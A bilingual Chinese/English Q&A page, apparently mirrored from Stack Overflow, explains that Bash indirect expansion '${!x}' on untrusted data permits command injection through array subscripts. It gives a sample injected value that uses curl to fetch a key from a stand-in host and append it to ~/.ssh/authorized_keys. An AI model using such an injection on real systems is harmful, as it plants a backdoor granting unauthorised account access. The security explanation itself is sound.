"$ {！x}"的安全注意事项Bash的间接扩展 [英] Safety considerations for "${!x}" indirect expansion in Bash

问题描述

假设 x 有一个变量，它包含未知的任意数据.

Suppose I have a variable, says x, that contains unknown, arbitrary data.

以下间接扩展是否有注入代码或其他形式的利用漏洞的风险?

Is the following indirect expansion at risk of code injection or other forms of exploits?

ARBITRARY_COMMAND "${!x}"

我知道在某些情况下，为有用的现实情况分配 x 的方式本身可能会带来风险，需要进行适当的控制或消毒，但是我在这里假设x 的初始化方式无法保证其价值，但在上述扩展之前并未受到攻击.

I know there are cases where the way x is assigned for useful real-life scenarios may by itself introduce risks and need to be properly controlled or sanitized, but I am assuming here that x has been initialized in a a way that makes no guarantee as to its value, yet is not exposed to exploits up to the expansion shown above.

推荐答案

简而言之:是的，对未知数据的任何自动扩展都是潜在的危险.

In short: YES, any automatic expansion of unknown data is potentially hazardous.

gniourf_gniourf 的答案:

x ='a [$(ls>& 2)]'

在扩展 $ {！x} 时，Bash会扩展 $ {a [$(ls>& 2)]} ，这是一个数组扩展，因此数组键中的术语 $(ls>& 2)，将被扩展...并将执行 ls (输出到stderr，因此我们都可以观察到ls确实已执行).

when expanding ${!x}, Bash will expand ${a[$(ls>&2)]}, which is an array expansion, so the term inside the array key, namely $(ls>&2), will be expanded... and this will execute ls (with output to stderr so that we can all observe that ls is indeed executed).

例如，您可以代替 ls :

x='a[$(curl -s bad.us/pubkey >> ~/.ssh/authorized_keys)]'

由 $ {！x} 进行评估时，会将一个可能不友好的公钥附加到您的authorized_keys文件中，这可能使不友好的人进入您的帐户.

Which when evaluated by ${!x} would append a potentially unfriendly public key to your authorized_keys file, which could allow an unfriendly person to ssh into your account.

这篇关于"$ {！x}"的安全注意事项Bash的间接扩展的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！